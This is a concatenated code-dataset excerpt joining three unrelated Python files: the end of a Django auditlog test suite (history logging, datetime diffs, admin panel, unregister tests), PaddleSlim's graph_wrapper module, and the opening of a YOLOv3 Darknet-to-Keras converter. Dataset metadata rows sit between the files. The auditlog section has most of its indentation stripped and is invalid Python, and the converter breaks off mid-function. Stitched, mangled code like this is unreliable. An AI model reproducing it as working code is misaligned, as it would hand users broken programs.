# Change text, ignore
sim.text = 'Short text'
sim.save()
self.assertTrue(sim.history.count() == 2, msg="There are two log entries")
class SimpleExcludeModelTest(TestCase):
"""Log only changes that are not in exclude_fields"""
def test_register_exclude_fields(self):
sem = SimpleExcludeModel(label='Exclude model', text='Looong text')
sem.save()
self.assertTrue(sem.history.count() == 1, msg="There is one log entry")
        # Change label, record
sem.label = 'Changed label'
sem.save()
self.assertTrue(sem.history.count() == 2, msg="There are two log entries")
        # Change text, ignore
sem.text = 'Short text'
sem.save()
self.assertTrue(sem.history.count() == 2, msg="There are two log entries")
class SimpleMappingModelTest(TestCase):
"""Diff displays fields as mapped field names where available through mapping_fields"""
def test_register_mapping_fields(self):
smm = SimpleMappingModel(sku='ASD301301A6', vtxt='2.1.5', not_mapped='Not mapped')
smm.save()
self.assertTrue(smm.history.latest().changes_dict['sku'][1] == 'ASD301301A6',
msg="The diff function retains 'sku' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_dict['not_mapped'][1] == 'Not mapped',
msg="The diff function does not map 'not_mapped' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_display_dict['Product No.'][1] == 'ASD301301A6',
msg="The diff function maps 'sku' as 'Product No.' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_display_dict['Version'][1] == '2.1.5',
msg=("The diff function maps 'vtxt' as 'Version' through verbose_name"
" setting on the model field and can be retrieved."))
self.assertTrue(smm.history.latest().changes_display_dict['not mapped'][1] == 'Not mapped',
msg=("The diff function uses the django default verbose name for 'not_mapped'"
" and can be retrieved."))
class AdditionalDataModelTest(TestCase):
"""Log additional data if get_additional_data is defined in the model"""
def test_model_without_additional_data(self):
obj_wo_additional_data = SimpleModel.objects.create(text='No additional '
'data')
obj_log_entry = obj_wo_additional_data.history.get()
self.assertIsNone(obj_log_entry.additional_data)
def test_model_with_additional_data(self):
related_model = SimpleModel.objects.create(text='Log my reference')
obj_with_additional_data = AdditionalDataIncludedModel(
label='Additional data to log entries', related=related_model)
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 1,
msg="There is 1 log entry")
log_entry = obj_with_additional_data.history.get()
self.assertIsNotNone(log_entry.additional_data)
extra_data = log_entry.additional_data
self.assertTrue(extra_data['related_model_text'] == related_model.text,
msg="Related model's text is logged")
self.assertTrue(extra_data['related_model_id'] == related_model.id,
msg="Related model's id is logged")
def test_model_with_additional_data_and_kwargs(self):
related_model = SimpleModel.objects.create(text='Log my reference')
obj_with_additional_data = AdditionalDataIncludedWithKwargsModel(
label='Additional data to log entries', related=related_model)
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 1,
msg="There is 1 log entry")
log_entry = obj_with_additional_data.history.get()
self.assertIsNotNone(log_entry.additional_data)
extra_data = log_entry.additional_data
self.assertTrue(extra_data['action'] == 0,
msg="Related model's create action is logged in additional data")
obj_with_additional_data.label = "update test"
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 2,
msg="There are 2 log entries")
log_entry = obj_with_additional_data.history.first()
extra_data = log_entry.additional_data
self.assertTrue(extra_data['action'] == 1,
msg="Related model's update action is logged in additional data")
class DateTimeFieldModelTest(TestCase):
"""Tests if DateTimeField changes are recognised correctly"""
utc_plus_one = timezone.get_fixed_timezone(datetime.timedelta(hours=1))
now = timezone.now()
def test_model_with_same_time(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to same datetime and timezone
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
dtm.timestamp = timestamp
dtm.date = datetime.date(2017, 1, 10)
dtm.time = datetime.time(12, 0)
dtm.save()
# Nothing should have changed
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
def test_model_with_different_timezone(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to same datetime in another timezone
timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=self.utc_plus_one)
dtm.timestamp = timestamp
dtm.save()
# Nothing should have changed
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
def test_model_with_different_datetime(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime in the same timezone
timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=timezone.utc)
dtm.timestamp = timestamp
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_date(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
        # Change date to another day in the same timezone
        date = datetime.date(2017, 1, 11)
dtm.date = date
dtm.save()
        # The date should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_time(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
        # Change time to another time of day
time = datetime.time(6, 0)
dtm.time = time
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_time_and_timezone(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime and another timezone
timestamp = datetime.datetime(2017, 1, 10, 14, 0, tzinfo=self.utc_plus_one)
dtm.timestamp = timestamp
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_changes_display_dict_datetime(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE))
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
dateformat.format(localized_timestamp, settings.DATETIME_FORMAT),
msg=("The datetime should be formatted according to Django's settings for"
" DATETIME_FORMAT"))
timestamp = timezone.now()
dtm.timestamp = timestamp
dtm.save()
localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE))
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
dateformat.format(localized_timestamp, settings.DATETIME_FORMAT),
msg=("The datetime should be formatted according to Django's settings for"
" DATETIME_FORMAT"))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
formats.localize(localized_timestamp),
msg=("The datetime should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_changes_display_dict_date(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
dateformat.format(date, settings.DATE_FORMAT),
msg=("The date should be formatted according to Django's settings for"
" DATE_FORMAT unless USE_L10N is True."))
date = datetime.date(2017, 1, 11)
dtm.date = date
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
dateformat.format(date, settings.DATE_FORMAT),
msg=("The date should be formatted according to Django's settings for"
" DATE_FORMAT unless USE_L10N is True."))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
formats.localize(date),
msg=("The date should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_changes_display_dict_time(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
dateformat.format(time, settings.TIME_FORMAT),
msg=("The time should be formatted according to Django's settings for"
" TIME_FORMAT unless USE_L10N is True."))
time = datetime.time(6, 0)
dtm.time = time
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
dateformat.format(time, settings.TIME_FORMAT),
msg=("The time should be formatted according to Django's settings for"
" TIME_FORMAT unless USE_L10N is True."))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
formats.localize(time),
msg=("The time should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_update_naive_dt(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
        # Changing the naive datetime field doesn't raise an error
dtm.naive_dt = timezone.make_naive(timezone.now(), timezone=timezone.utc)
dtm.save()
class UnregisterTest(TestCase):
def setUp(self):
auditlog.unregister(SimpleModel)
self.obj = SimpleModel.objects.create(text='No history')
def tearDown(self):
# Re-register for future tests
auditlog.register(SimpleModel)
def test_unregister_create(self):
"""Creation is not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Check for log entries
self.assertTrue(obj.history.count() == 0, msg="There are no log entries")
def test_unregister_update(self):
"""Updates are not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Change something
obj.boolean = True
obj.save()
# Check for log entries
self.assertTrue(obj.history.count() == 0, msg="There are no log entries")
def test_unregister_delete(self):
"""Deletion is not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Delete the object
obj.delete()
# Check for log entries
self.assertTrue(LogEntry.objects.count() == 0, msg="There are no log entries")
class ChoicesFieldModelTest(TestCase):
def setUp(self):
self.obj = ChoicesFieldModel.objects.create(
status=ChoicesFieldModel.RED,
multiplechoice=[ChoicesFieldModel.RED, ChoicesFieldModel.YELLOW, ChoicesFieldModel.GREEN],
)
def test_changes_display_dict_single_choice(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Red",
msg="The human readable text 'Red' is displayed.")
self.obj.status = ChoicesFieldModel.GREEN
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Green", msg="The human readable text 'Green' is displayed.")
def test_changes_display_dict_multiplechoice(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red, Yellow, Green",
msg="The human readable text 'Red, Yellow, Green' is displayed.")
self.obj.multiplechoice = ChoicesFieldModel.RED
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red",
msg="The human readable text 'Red' is displayed.")
class CharfieldTextfieldModelTest(TestCase):
def setUp(self):
self.PLACEHOLDER_LONGCHAR = "s" * 255
self.PLACEHOLDER_LONGTEXTFIELD = "s" * 1000
self.obj = CharfieldTextfieldModel.objects.create(
longchar=self.PLACEHOLDER_LONGCHAR,
longtextfield=self.PLACEHOLDER_LONGTEXTFIELD,
)
def test_changes_display_dict_longchar(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == \
"{}...".format(self.PLACEHOLDER_LONGCHAR[:140]),
msg="The string should be truncated at 140 characters with an ellipsis at the end.")
SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGCHAR[:139]
self.obj.longchar = SHORTENED_PLACEHOLDER
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == SHORTENED_PLACEHOLDER,
msg="The field should display the entire string because it is less than 140 characters")
def test_changes_display_dict_longtextfield(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == \
"{}...".format(self.PLACEHOLDER_LONGTEXTFIELD[:140]),
msg="The string should be truncated at 140 characters with an ellipsis at the end.")
SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGTEXTFIELD[:139]
self.obj.longtextfield = SHORTENED_PLACEHOLDER
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == SHORTENED_PLACEHOLDER,
msg="The field should display the entire string because it is less than 140 characters")
class PostgresArrayFieldModelTest(TestCase):
databases = '__all__'
def setUp(self):
self.obj = PostgresArrayFieldModel.objects.create(
arrayfield=[PostgresArrayFieldModel.RED, PostgresArrayFieldModel.GREEN],
)
@property
def latest_array_change(self):
return self.obj.history.latest().changes_display_dict["arrayfield"][1]
def test_changes_display_dict_arrayfield(self):
self.assertTrue(self.latest_array_change == "Red, Green",
msg="The human readable text for the two choices, 'Red, Green' is displayed.")
self.obj.arrayfield = [PostgresArrayFieldModel.GREEN]
self.obj.save()
self.assertTrue(self.latest_array_change == "Green",
msg="The human readable text 'Green' is displayed.")
self.obj.arrayfield = []
self.obj.save()
self.assertTrue(self.latest_array_change == "",
msg="The human readable text '' is displayed.")
self.obj.arrayfield = [PostgresArrayFieldModel.GREEN]
self.obj.save()
self.assertTrue(self.latest_array_change == "Green",
msg="The human readable text 'Green' is displayed.")
class CompatibilityTest(TestCase):
"""Test case for compatibility functions."""
def test_is_authenticated(self):
"""Test that the 'is_authenticated' compatibility function is working.
Bit of explanation: the `is_authenticated` property on request.user is
*always* set to 'False' for AnonymousUser, and it is *always* set to
'True' for *any* other (i.e. identified/authenticated) user.
So, the logic of this test is to ensure that compat.is_authenticated()
returns the correct value based on whether or not the User is an
anonymous user (simulating what goes on in the real request.user).
"""
# Test compat.is_authenticated for anonymous users
self.user = auth.get_user(self.client)
if django.VERSION < (1, 10):
assert self.user.is_anonymous()
else:
assert self.user.is_anonymous
assert not compat.is_authenticated(self.user)
# Setup some other user, which is *not* anonymous, and check
# compat.is_authenticated
self.user = User.objects.create(
username="test.user",
email="test.user@mail.com",
password="auditlog"
)
if django.VERSION < (1, 10):
assert not self.user.is_anonymous()
else:
assert not self.user.is_anonymous
assert compat.is_authenticated(self.user)
class AdminPanelTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.username = "test_admin"
cls.password = User.objects.make_random_password()
cls.user, created = User.objects.get_or_create(username=cls.username)
cls.user.set_password(cls.password)
cls.user.is_staff = True
cls.user.is_superuser = True
cls.user.is_active = True
cls.user.save()
cls.obj = SimpleModel.objects.create(text='For admin logentry test')
def test_auditlog_admin(self):
self.client.login(username=self.username, password=self.password)
log_pk = self.obj.history.latest().pk
res = self.client.get("/admin/auditlog/logentry/")
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/add/")
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/".format(log_pk), follow=True)
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/delete/".format(log_pk))
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/history/".format(log_pk))
assert res.status_code == 200
class NoDeleteHistoryTest(TestCase):
def test_delete_related(self):
instance = SimpleModel.objects.create(integer=1)
assert LogEntry.objects.all().count() == 1
instance.integer = 2
instance.save()
assert LogEntry.objects.all().count() == 2
instance.delete()
entries = LogEntry.objects.order_by('id')
# The "DELETE" record is always retained
assert LogEntry.objects.all().count() == 1
assert entries.first().action == LogEntry.Action.DELETE
def test_no_delete_related(self):
instance = NoDeleteHistoryModel.objects.create(integer=1)
self.assertEqual(LogEntry.objects.all().count(), 1)
instance.integer = 2
instance.save()
self.assertEqual(LogEntry.objects.all().count(), 2)
instance.delete()
entries = LogEntry.objects.order_by('id')
self.assertEqual(entries.count(), 3)
self.assertEqual(
list(entries.values_list('action', flat=True)),
[LogEntry.Action.CREATE, LogEntry.Action.UPDATE, LogEntry.Action.DELETE]
)
| 43.763121 | 199 | 0.649402 |
f0fca9336734096ae4c63a992ee89e802a125b3b | 10,715 | py | Python | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 926 | 2019-12-16T05:06:56.000Z | 2022-03-31T07:22:10.000Z | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 327 | 2019-12-16T06:04:31.000Z | 2022-03-30T11:08:18.000Z | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 234 | 2019-12-16T03:12:08.000Z | 2022-03-27T12:59:39.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import copy
import pickle
import numpy as np
from collections import OrderedDict
from collections.abc import Iterable
from paddle.fluid.framework import Program, program_guard, Parameter, Variable
__all__ = ['GraphWrapper', 'VarWrapper', 'OpWrapper']
OPTIMIZER_OPS = [
'momentum',
'lars_momentum',
'adagrad',
'adam',
'adamax',
'dpsgd',
'decayed_adagrad',
'adadelta',
'rmsprop',
]
class VarWrapper(object):
def __init__(self, var, graph):
assert isinstance(var, Variable)
assert isinstance(graph, GraphWrapper)
self._var = var
self._graph = graph
def __eq__(self, v):
"""
Overwrite this function for ...in... syntax in python.
"""
return (v is not None) and self._var.name == v._var.name
def name(self):
"""
Get the name of the variable.
"""
return self._var.name
def __repr__(self):
return self._var.name
def __lt__(self, other):
return self._var.name < other._var.name
def __gt__(self, other):
return self._var.name > other._var.name
def shape(self):
"""
        Get the shape of the variable.
"""
return self._var.shape
def set_shape(self, shape):
"""
Set the shape of the variable.
"""
self._var.desc.set_shape(shape)
def inputs(self):
"""
Get all the operators that use this variable as output.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_outputs():
ops.append(op)
return ops
def outputs(self):
"""
Get all the operators that use this variable as input.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_inputs():
ops.append(op)
return ops
def is_parameter(self):
return isinstance(self._var, Parameter)
class OpWrapper(object):
def __init__(self, op, graph):
assert isinstance(graph, GraphWrapper)
self._op = op
self._graph = graph
def __eq__(self, op):
"""
Overwrite this function for ...in... syntax in python.
"""
return self.idx() == op.idx()
def all_inputs(self):
"""
Get all the input variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.input_arg_names
]
def all_outputs(self):
"""
Get all the output variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.output_arg_names
]
def idx(self):
"""
Get the id of this operator.
"""
return self._op.idx
def type(self):
"""
Get the type of this operator.
"""
return self._op.type
def __repr__(self):
return "op[id: {}, type: {}; inputs: {}]".format(self.idx(),
self.type(),
self.all_inputs())
def __lt__(self, other):
return self._op.idx < other._op.idx
def __gt__(self, other):
return self._op.idx > other._op.idx
def is_bwd_op(self):
"""
Whether this operator is backward op.
"""
return self.type().endswith('_grad')
def is_opt_op(self):
"""
Whether this operator is optimizer op.
"""
return self.type() in OPTIMIZER_OPS
def inputs(self, name):
"""
Get all the varibales by the input name.
"""
if name in self._op.input_names:
return [
self._graph.var(var_name) for var_name in self._op.input(name)
]
return []
def outputs(self, name):
"""
        Get all the variables by the output name.
"""
if name in self._op.output_names:
return [
self._graph.var(var_name) for var_name in self._op.output(name)
]
return []
def set_attr(self, key, value):
"""
Set the value of attribute by attribute's name.
Args:
key(str): the attribute name.
value(bool|int|str|float|list): the value of the attribute.
"""
self._op._set_attr(key, value)
def attr(self, name):
"""
Get the attribute by name.
Args:
name(str): the attribute name.
Returns:
bool|int|str|float|list: The attribute value. The return value
can be any valid attribute type.
"""
if self._op.has_attr(name):
return self._op.attr(name)
else:
return None
class GraphWrapper(object):
"""
It is a wrapper of paddle.fluid.framework.IrGraph with some special functions
for paddle slim framework.
Args:
        program(framework.Program): The program to be wrapped.
in_nodes(dict): A dict to indicate the input nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
        out_nodes(dict): A dict to indicate the output nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
"""
def __init__(self, program=None, in_nodes=[], out_nodes=[]):
"""
"""
super(GraphWrapper, self).__init__()
self.program = Program() if program is None else program
self.persistables = {}
self.teacher_persistables = {}
for var in self.program.list_vars():
if var.persistable:
self.persistables[var.name] = var
self.compiled_graph = None
in_nodes = [] if in_nodes is None else in_nodes
out_nodes = [] if out_nodes is None else out_nodes
self.in_nodes = OrderedDict(in_nodes)
self.out_nodes = OrderedDict(out_nodes)
self._attrs = OrderedDict()
def all_parameters(self):
"""
Get all the parameters in this graph.
Returns:
list<VarWrapper>: A list of VarWrapper instances.
"""
params = []
for block in self.program.blocks:
for param in block.all_parameters():
params.append(VarWrapper(param, self))
return params
def is_parameter(self, var):
"""
Whether the given variable is parameter.
Args:
            var(VarWrapper): The given variable.
"""
return isinstance(var._var, Parameter)
def is_persistable(self, var):
"""
Whether the given variable is persistable.
Args:
            var(VarWrapper): The given variable.
"""
return var._var.persistable
def ops(self):
"""
        Return all the operator nodes included in the graph as a list.
"""
ops = []
for block in self.program.blocks:
for op in block.ops:
ops.append(OpWrapper(op, self))
return ops
def vars(self):
"""
Get all the variables.
"""
return [VarWrapper(var, self) for var in self.program.list_vars()]
def var(self, name):
"""
Get the variable by variable name.
"""
for block in self.program.blocks:
if block.has_var(name):
return VarWrapper(block.var(name), self)
return None
def clone(self, for_test=False):
"""
Clone a new graph from current graph.
Returns:
(GraphWrapper): The wrapper of a new graph.
"""
return GraphWrapper(
self.program.clone(for_test),
copy.deepcopy(self.in_nodes), copy.deepcopy(self.out_nodes))
def program(self):
"""
Get the program in current wrapper.
"""
return self.program
def pre_ops(self, op):
"""
Get all the previous operators of target operator.
Args:
op(OpWrapper): Target operator.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for in_var in op.all_inputs():
if in_var in p.all_outputs():
ops.append(p)
return ops
def next_ops(self, op):
"""
Get all the next operators of target operator.
Args:
op(OpWrapper): Target operator.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for out_var in op.all_outputs():
if out_var in p.all_inputs():
ops.append(p)
return ops
def get_param_by_op(self, op):
"""
Get the parameters used by target operator.
"""
assert isinstance(op, OpWrapper)
params = []
for var in op.all_inputs():
if isinstance(var._var, Parameter):
params.append(var)
assert len(params) > 0
return params
def numel_params(self):
"""
Get the number of elements in all parameters.
"""
ret = 0
for param in self.all_parameters():
ret += np.product(param.shape())
return ret
def infer_shape(self):
"""
        Infer the shapes of all variables in the graph according to the current parameters.
It is used after loading pruned parameters from file.
"""
for op in self.ops():
if op.type() != 'conditional_block':
op._op.desc.infer_shape(op._op.block.desc)
| 27.334184 | 81 | 0.55399 |
bb66fe3bab18e509025676957911cbd8f8be6a93 | 10,210 | py | Python | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | #! /usr/bin/env python
"""
Reads Darknet config and weights and creates Keras model with TF backend.
"""
import argparse
import configparser
import io
import os
from collections import defaultdict
import numpy as np
from keras import backend as K
from keras.layers import (Conv2D, Input, ZeroPadding2D, Add,
UpSampling2D, MaxPooling2D, Concatenate)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from keras.utils.vis_utils import plot_model as plot
parser = argparse.ArgumentParser(description='Darknet To Keras Converter.')
parser.add_argument('--config_path', default='yolov3.cfg',help='Path to Darknet cfg file.')
parser.add_argument('--weights_path', default='model_data/yolov3.weights',help='Path to Darknet weights file.')
parser.add_argument('--output_path', default='model_data/yolo_weights.h5',help='Path to output Keras model file.')
parser.add_argument(
'-p',
'--plot_model',
help='Plot generated Keras model and save as image.',
action='store_true')
parser.add_argument(
'-w',
'--weights_only',
help='Save as Keras weights file instead of model file.',
action='store_true')
def unique_config_sections(config_file):
"""Convert all config sections to have unique names.
    Adds unique suffixes to config sections for compatibility with configparser.
"""
section_counters = defaultdict(int)
output_stream = io.StringIO()
with open(config_file,encoding='utf-8') as fin:
for line in fin:
if line.startswith('['):
section = line.strip().strip('[]')
_section = section + '_' + str(section_counters[section])
section_counters[section] += 1
line = line.replace(section, _section)
output_stream.write(line)
output_stream.seek(0)
return output_stream
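# Illustration of the renaming above, assuming a cfg with repeated headers:
#   [net] [convolutional] [convolutional] [yolo]
# becomes
#   [net_0] [convolutional_0] [convolutional_1] [yolo_0]
# so configparser no longer sees duplicate section names.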
# %%
def _main(args):
config_path = os.path.expanduser(args.config_path)
weights_path = os.path.expanduser(args.weights_path)
assert config_path.endswith('.cfg'), '{} is not a .cfg file'.format(
config_path)
assert weights_path.endswith(
'.weights'), '{} is not a .weights file'.format(weights_path)
output_path = os.path.expanduser(args.output_path)
assert output_path.endswith(
'.h5'), 'output path {} is not a .h5 file'.format(output_path)
output_root = os.path.splitext(output_path)[0]
# Load weights and config.
print('Loading weights.')
weights_file = open(weights_path, 'rb')
major, minor, revision = np.ndarray(
shape=(3, ), dtype='int32', buffer=weights_file.read(12))
if (major*10+minor)>=2 and major<1000 and minor<1000:
seen = np.ndarray(shape=(1,), dtype='int64', buffer=weights_file.read(8))
else:
seen = np.ndarray(shape=(1,), dtype='int32', buffer=weights_file.read(4))
print('Weights Header: ', major, minor, revision, seen)
print('Parsing Darknet config.')
unique_config_file = unique_config_sections(config_path)
cfg_parser = configparser.ConfigParser()
cfg_parser.read_file(unique_config_file)
print('Creating Keras model.')
input_layer = Input(shape=(None, None, 3))
prev_layer = input_layer
all_layers = []
weight_decay = float(cfg_parser['net_0']['decay']
) if 'net_0' in cfg_parser.sections() else 5e-4
count = 0
out_index = []
for section in cfg_parser.sections():
print('Parsing section {}'.format(section))
if section.startswith('convolutional'):
filters = int(cfg_parser[section]['filters'])
size = int(cfg_parser[section]['size'])
stride = int(cfg_parser[section]['stride'])
pad = int(cfg_parser[section]['pad'])
activation = cfg_parser[section]['activation']
batch_normalize = 'batch_normalize' in cfg_parser[section]
padding = 'same' if pad == 1 and stride == 1 else 'valid'
# Setting weights.
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
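            # Rough size check (illustrative numbers, not from any real layer):
            # a 3x3 conv with 16 input and 32 output channels stores 32 biases
            # (+ 3*32 batch-norm values if batch_normalize) followed by
            # 3*3*16*32 = 4608 float32 weights, i.e. 4608 * 4 bytes read below.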
prev_layer_shape = K.int_shape(prev_layer)
weights_shape = (size, size, prev_layer_shape[-1], filters)
darknet_w_shape = (filters, weights_shape[2], size, size)
weights_size = np.product(weights_shape)
print('conv2d', 'bn'
if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters, ),
dtype='float32',
buffer=weights_file.read(filters * 4))
count += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype='float32',
buffer=weights_file.read(filters * 12))
count += 3 * filters
bn_weight_list = [
bn_weights[0], # scale gamma
conv_bias, # shift beta
bn_weights[1], # running mean
bn_weights[2] # running var
]
conv_weights = np.ndarray(
shape=darknet_w_shape,
dtype='float32',
buffer=weights_file.read(weights_size * 4))
count += weights_size
# DarkNet conv_weights are serialized Caffe-style:
# (out_dim, in_dim, height, width)
# We would like to set these to Tensorflow order:
# (height, width, in_dim, out_dim)
conv_weights = np.transpose(conv_weights, [2, 3, 1, 0])
conv_weights = [conv_weights] if batch_normalize else [
conv_weights, conv_bias
]
# Handle activation.
act_fn = None
if activation == 'leaky':
pass # Add advanced activation later.
elif activation != 'linear':
raise ValueError(
'Unknown activation function `{}` in section {}'.format(
activation, section))
# Create Conv2D layer
if stride>1:
# Darknet uses left and top padding instead of 'same' mode
